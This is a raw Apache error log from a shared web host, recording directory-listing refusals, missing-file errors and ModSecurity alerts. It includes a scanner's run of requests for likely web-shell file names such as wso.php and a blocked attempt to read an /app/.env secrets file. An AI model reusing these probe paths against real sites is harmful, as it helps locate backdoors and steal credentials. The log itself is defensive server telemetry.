[Mon May 11 23:32:10.536482 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:25.580415 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:26.156215 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:32.486974 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:33.166384 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:38.028021 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:48.159335 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:48.819387 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:49.393846 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:57.428031 2026] [authz_core:error] [pid 1630927:tid 1630943] [client 47.128.28.208:22984] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/IXR/error_log
[Mon May 11 23:33:24.312347 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:24.869404 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:25.398128 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:34.414598 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:34.964691 2026] [autoindex:error] [pid 1630927:tid 1630935] [client 172.190.142.176:49781] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:35.531055 2026] [autoindex:error] [pid 1630927:tid 1630935] [client 172.190.142.176:49781] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:39.202458 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:39.751470 2026] [autoindex:error] [pid 1630927:tid 1630935] [client 172.190.142.176:49781] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:33:41.605273 2026] [proxy_fcgi:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01071: Got error 'Primary script unknown'
[Mon May 11 23:33:50.131344 2026] [authz_core:error] [pid 1605480:tid 1605529] [client 216.73.216.110:43106] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/template/default/auth/error_log
[Mon May 11 23:33:51.175740 2026] [autoindex:error] [pid 1630927:tid 1630935] [client 172.190.142.176:49781] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:34:05.554096 2026] [autoindex:error] [pid 1606352:tid 1606428] [client 172.190.142.176:14220] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:34:06.068152 2026] [autoindex:error] [pid 1630927:tid 1630935] [client 172.190.142.176:49781] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:34:09.761415 2026] [security2:error] [pid 1588898:tid 1590048] [client 43.155.26.193:59078] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2018/08/les-youngtimers-1980a2000-le"] [unique_id "agJLUaFW67LJTsgN3jQkGgAAAAE"]
[Mon May 11 23:34:24.537181 2026] [autoindex:error] [pid 1601130:tid 1601169] [client 172.190.142.176:11863] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:34:25.306516 2026] [autoindex:error] [pid 1630927:tid 1630935] [client 172.190.142.176:49781] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:34:30.168502 2026] [ssl:error] [pid 1590352:tid 1590409] (EAI 2)Name or service not known: [client 157.22.100.60:35555] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:34:30.168554 2026] [ssl:error] [pid 1590352:tid 1590409] AH01941: stapling_renew_response: responder error
[Mon May 11 23:34:52.134919 2026] [security2:error] [pid 1590352:tid 1590406] [client 129.226.174.80:51516] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/solo/"] [unique_id "agJLfK1q0G_aXAqWauQRJgAAAI4"]
[Mon May 11 23:34:52.671869 2026] [security2:error] [pid 1605480:tid 1605534] [client 43.131.36.84:56364] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/conditions-generales-de-location/"] [unique_id "agJLfB2Cvzd_nyNfUm8WfgAAAQw"]
[Mon May 11 23:34:53.450468 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/file.php
[Mon May 11 23:34:53.609188 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/ms-edit.php
[Mon May 11 23:34:53.766632 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/w.php
[Mon May 11 23:34:53.924045 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/a7.php
[Mon May 11 23:34:54.238949 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/goods.php
[Mon May 11 23:34:54.398869 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/Cap.php
[Mon May 11 23:34:54.556245 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/aaa.php
[Mon May 11 23:34:55.028193 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/0x.php
[Mon May 11 23:34:55.815446 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/edit.php
[Mon May 11 23:34:56.133039 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/adminfuns.php
[Mon May 11 23:34:56.923182 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/send.php
[Mon May 11 23:34:58.333145 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/as.php
[Mon May 11 23:34:58.661073 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/sql.php
[Mon May 11 23:34:58.818494 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/epinyins.php
[Mon May 11 23:34:58.927745 2026] [autoindex:error] [pid 1590352:tid 1590398] [client 172.190.142.176:49754] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:34:58.975761 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/size.php
[Mon May 11 23:34:59.133872 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/wp-sing.php
[Mon May 11 23:34:59.479389 2026] [autoindex:error] [pid 1606352:tid 1606436] [client 172.190.142.176:53463] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:00.118433 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/s.php
[Mon May 11 23:35:00.602844 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/wp-logs.php
[Mon May 11 23:35:00.762059 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/wp-trackback.php
[Mon May 11 23:35:00.919726 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/gg.php
[Mon May 11 23:35:01.079286 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/tmp.php
[Mon May 11 23:35:01.237596 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/buy.php
[Mon May 11 23:35:01.263997 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:01.405828 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/wso.php
[Mon May 11 23:35:01.788422 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:02.037827 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/term.php
[Mon May 11 23:35:02.344521 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:02.353114 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/server.php
[Mon May 11 23:35:02.982222 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/wp-links.php
[Mon May 11 23:35:02.989265 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:03.622956 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/class-t.api.php
[Mon May 11 23:35:03.780294 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/test.php
[Mon May 11 23:35:04.122141 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/wp-signin.php
[Mon May 11 23:35:04.279340 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/x.php
[Mon May 11 23:35:04.610040 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/doc.php
[Mon May 11 23:35:04.781300 2026] [:error] [pid 1606352:tid 1606442] [client 4.193.121.6:3846] File does not exist: /home/piregwan/public_html/.well-known/pki-validation/admin.php
[Mon May 11 23:35:20.498649 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:21.098471 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:29.777552 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:30.313262 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:34.512255 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:39.042587 2026] [security2:error] [pid 1606352:tid 1606425] [client 176.65.139.235:43414] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agJLq3o_DFxNSZVmaX3oEwAAAMY"]
[Mon May 11 23:35:39.042821 2026] [security2:error] [pid 1606352:tid 1606425] [client 176.65.139.235:43414] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agJLq3o_DFxNSZVmaX3oEwAAAMY"]
[Mon May 11 23:35:39.492748 2026] [security2:error] [pid 1606352:tid 1606425] [client 176.65.139.235:43414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/.env"] [unique_id "agJLq3o_DFxNSZVmaX3oEwAAAMY"]
[Mon May 11 23:35:47.159049 2026] [autoindex:error] [pid 1601130:tid 1601156] [client 172.190.142.176:64153] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:47.659205 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:35:48.314632 2026] [autoindex:error] [pid 1605480:tid 1605526] [client 172.190.142.176:20527] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:36:14.935364 2026] [security2:error] [pid 1601130:tid 1601164] [client 43.159.145.153:45442] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/"] [unique_id "agJLznEgAO_835W6c1mvGgAAAE4"]
